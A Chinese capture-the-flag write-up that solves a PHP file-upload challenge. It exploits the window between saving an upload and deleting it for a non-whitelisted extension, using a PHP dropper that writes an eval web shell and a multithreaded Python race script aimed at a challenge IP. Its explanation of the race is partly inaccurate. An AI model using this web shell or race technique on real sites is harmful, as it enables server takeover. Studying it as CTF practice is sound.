wzsc_文件上传
wzsc_文件上传
源码:
<?php
$allowtype = array("txt","jpeg","bmv","doc","docx","gif","png","jpg");
$size = 10000000;
$path = "./upload/";
$filename = $_FILES['file']['name'];
if (is_uploaded_file($_FILES['file']['tmp_name'])){
if (!move_uploaded_file($_FILES['file']['tmp_name'],$path.$filename)){
exit();
}
} else {
exit();
}
$newfile = $path.$filename;
if ($_FILES['file']['error'] > 0){
unlink($newfile);
exit();
}
$ext = array_pop(explode(".",$_FILES['file']['name']));
if (!in_array($ext,$allowtype)){
unlink($newfile);
exit();
}
?>
思路:
发现对文件后缀进行白名单限制了,这里我们可以用竞争绕过。
文件上传的一般原理是客户端将文件数据分块传输给服务器,服务器再将这些分块数据组合成完整的文件。在条件竞争中,可能会出现如下情况:
- 客户端同时发起多个上传请求:多个并发的请求同时到达服务器,服务器可能无法正确处理这些请求的顺序。
- 多个请求同时写同一个文件:如果多个请求同时写同一个文件,可能会导致文件数据的覆盖或重叠,最终文件内容可能不完整或不正确。
解题:
上传a.php内容为:
<?php fputs(fopen("shell.php", "w"), '<?php @eval($_POST["shell"]); ?>'); ?>
bp抓包后放入攻击器中多次进行post请求:
在进行多次post请求的同时,配合以下代码进行竞争:
import requests
import threading
import os
class RaceCondition(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.url = 'http://61.147.171.105:58861/upload/a.php'
self.uploadUrl = 'http://61.147.171.105:58861/upload/shell.php'
def _get(self):
print('try to call uploaded file...')
r = requests.get(self.url)
if r.status_code == 200:
print('[*] create file shell.php success.')
os._exit(0)
def _upload(self):
print('upload file...')
rs = requests.get(self.uploadUrl)
if rs.status_code == 200:
print('[*] create file shell.php success.')
os._exit(0)
def run(self):
while True:
for i in range(5):
self._get()
for i in range(10):
self._upload()
self._get()
if __name__ == '__main__':
threads = 50
for i in range(threads):
t = RaceCondition()
t.start()
for i in range(threads):
t.join()
蚁剑连接/upload/shell.php就得到了flag
浙公网安备 33010602011771号